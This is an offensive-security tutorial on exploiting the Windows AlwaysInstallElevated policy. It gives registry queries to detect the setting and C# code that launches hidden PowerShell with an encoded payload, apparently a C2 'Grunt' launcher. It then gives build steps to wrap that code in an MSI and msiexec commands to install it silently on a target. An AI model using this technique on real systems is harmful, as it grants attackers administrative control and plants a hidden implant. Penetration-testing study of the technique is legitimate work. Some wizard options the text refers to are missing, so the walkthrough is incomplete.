This policy allows standard users to install applications that require access to directories and registry keys that they may not usually have permission to change. This is equivalent to granting full administrative rights and even though Microsoft strongly discourages its use, it can still be found.
The easiest method to determine if this issue exist on the host is to query the following registry keys:
reg query **HKCU**\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated
reg query **HKLM**\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated
If it was returned as '1' then we can escalate our privileges.
To exploit this, we need to package a payload into an MSI installer that will install and run a PowerShell Grunt Launcher. Create a new .NET Framework Console App and copy the code below (inserting your PowerShell payload).
using System.Diagnostics;
namespace ExploitMSI
{
class Program
{
static void Main(string[] args)
{
var processStartInfo = new ProcessStartInfo
{
FileName = @"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
Arguments = @"‐Sta ‐Nop ‐Window Hidden ‐EncodedCommand <blah>"
};
var process = new Process
{
StartInfo = processStartInfo
};
process.Start();
process.WaitForExit();
process.Dispose();
}
}
}
Go into the project properties and change the Output type from a Console Application to a Windows Application. This will prevent the installer from opening a window on the user’s desktop.
Next, right-click on the Solution in the Solution Explorer and Add a New Project. Find and choose the Setup Wizard.
As you click through the wizard, select the following options:
Leave everything else blank/default and your project.
If the platform is x64 - change the TargetPlatform to x64 by Right-click on the Installer Project and go to 'View > Custom Actions'. Then right-click on 'Install' and select 'Add Custom Action'. Navigate into 'Application Folder', select 'Primary Output' and click OK. Then highlight the new item and in the Properties window, change 'InstallerClass' to 'False' and Run64Bit to True.
The final step in the setup is to ensure .NET Framework targeting and dependencies are correct. Double-click Microsoft .NET Framework under the Detected Dependencies folder and change the Version to something appropriate for your target.
Build the Console App project and then Installer project. This should output .msi, which you need to upload to the target.
Upload to the host and execute via a GUI or use a shell command:
msiexec /quiet /qn /i met.msi
msiexec /x C:\\Temp\\met.msi /qn